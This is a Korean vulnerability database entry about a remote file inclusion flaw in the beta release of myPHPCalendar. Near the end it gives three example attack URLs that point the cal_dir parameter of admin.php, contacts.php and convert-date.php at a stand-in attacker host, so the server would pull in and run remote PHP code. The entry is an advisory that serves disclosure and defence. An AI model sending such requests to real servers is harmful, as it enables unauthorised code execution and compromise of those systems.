English

◀◁ 뒤로 취약점ID 21266 위험도 40 포트 80, ... 프로토콜 TCP 분류 CGI 상세설명 해당 myPHPCalendar는 다수의 스크립트 결함으로 인한 파일 삽입 취약점을 가지고 있다. myPHPCalendar는 PHP4로 작성된 무료로 사용 가능한 달력 프로그램으로써, MySQL 데이터베이스를 사용하고 MS Windows, Linux, Unix 계열의 운영체제 상에서 동작한다. 이 myPHPCalendar의 버전 10192000 Build 1 Beta 는 admin.php, contacts.php, convert-date.php와 같은 다수의 스크립트 결함으로 인하여 악의적인 서버 상에서 제공되는 PHP 파일들이 대상 호스트에 포함(include)될 수 있는 결함이 존재한다. 공격자는 악의적인 서버 상에 악의적인 PHP 파일들을 설치하여 취약한 시스템에 임의의 코드를 실행시키는 데 그 파일들을 사용할 수 있다. 원격지의 공격자는 인수로써 원격지의 시스템상에 있는 악의적인 PHP 파일을 명기한 잘 조작된 URL 요청을 'admin.php' 혹은 'contacts.php' 스크립트로 보낸다. 이는 이 문제에 영향을 받는 시스템상에 임의의 코드를 실행시킬 수 있게 해 준다. http://[target]/admin.php?cal_dir=http://[attacker]/ http://[target]/contacts.php?cal_dir=http://[attacker]/ http://[target]/convert-date.php?cal_dir=http://[attacker]/ * 참고 사이트 : http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0011.html * 영향을 받는 플랫폼: MyPHPCalendar 10192000 Build1 Beta Linux Any version Unix Any version Windows Any version 해결책 2014년 6월 현재 이 취약점에 대한 적절한 해결책은 제시되어 있지 않다. 관련 URL (CVE) 관련 URL (SecurityFocus) 관련 URL 13409 (ISS)